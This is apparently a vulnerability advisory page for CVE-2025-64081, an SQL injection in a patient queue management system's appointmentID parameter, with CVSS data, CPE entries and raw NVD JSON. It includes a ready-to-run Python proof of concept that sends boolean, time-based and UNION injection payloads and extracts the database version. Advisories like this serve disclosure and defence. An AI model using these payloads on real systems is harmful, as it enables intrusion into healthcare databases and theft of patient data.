Security Vulnerability Report
中文
CVE-2025-64081 CVSS 9.8 CRITICAL

CVE-2025-64081

Published: 2025-12-08 18:15:53
Last Modified: 2025-12-08 22:15:53
Source: [email protected]

Description

SQL injection vulnerability in /php/api_patient_schedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pamzey:patients_waiting_area_queue_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Patients Waiting Area Queue Management System v1.0
SourceCodester Patients Waiting Area Queue Management System v1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64081 SQL Injection PoC # Target: SourceCodester Patients Waiting Area Queue Management System v1 # File: /php/api_patient_schedule.php # Parameter: appointmentID import requests import sys target = "http://target.com" # Replace with actual target URL endpoint = "/php/api_patient_schedule.php" def test_sql_injection(url, param_name): """Test for SQL injection vulnerability""" # Basic SQL injection test - Boolean based true_payload = f"' OR '1'='1" # Should return all records false_payload = f"' OR '1'='2" # Should return no records or error # Time-based blind SQL injection for MySQL time_payload = "' AND SLEEP(5)-- -" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } print("[*] Testing CVE-2025-64081 SQL Injection...") # Test 1: Boolean-based injection print("\n[*] Test 1: Boolean-based injection") params_true = {param_name: true_payload} params_false = {param_name: false_payload} try: resp_true = requests.get(url, params=params_true, headers=headers, timeout=10) resp_false = requests.get(url, params=params_false, headers=headers, timeout=10) print(f"[+] True payload response length: {len(resp_true.text)}") print(f"[+] False payload response length: {len(resp_false.text)}") if len(resp_true.text) != len(resp_false.text): print("[!] Potential SQL injection detected!") except Exception as e: print(f"[-] Error: {e}") # Test 2: Time-based blind SQL injection print("\n[*] Test 2: Time-based blind SQL injection") params_time = {param_name: time_payload} try: import time start = time.time() resp_time = requests.get(url, params=params_time, headers=headers, timeout=15) elapsed = time.time() - start print(f"[+] Response time: {elapsed:.2f}s") if elapsed >= 5: print("[!] Time delay detected - SQL injection confirmed!") except Exception as e: print(f"[-] Error: {e}") # Test 3: Database version extraction using UNION injection print("\n[*] Test 3: Database enumeration") union_payload = "' UNION SELECT NULL,NULL,VERSION(),NULL,NULL-- -" params_union = {param_name: union_payload} try: resp_union = requests.get(url, params=params_union, headers=headers, timeout=10) print(f"[+] UNION injection response: {resp_union.text[:500]}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] url = f"{target}{endpoint}" test_sql_injection(url, "appointmentID") print("\n[*] PoC completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64081", "sourceIdentifier": "[email protected]", "published": "2025-12-08T18:15:52.720", "lastModified": "2025-12-08T22:15:52.810", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerability in /php/api_patient_schedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pamzey:patients_waiting_area_queue_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "69FC38AE-BCD1-4A41-B2E0-CE3DEE703691"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/211592", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.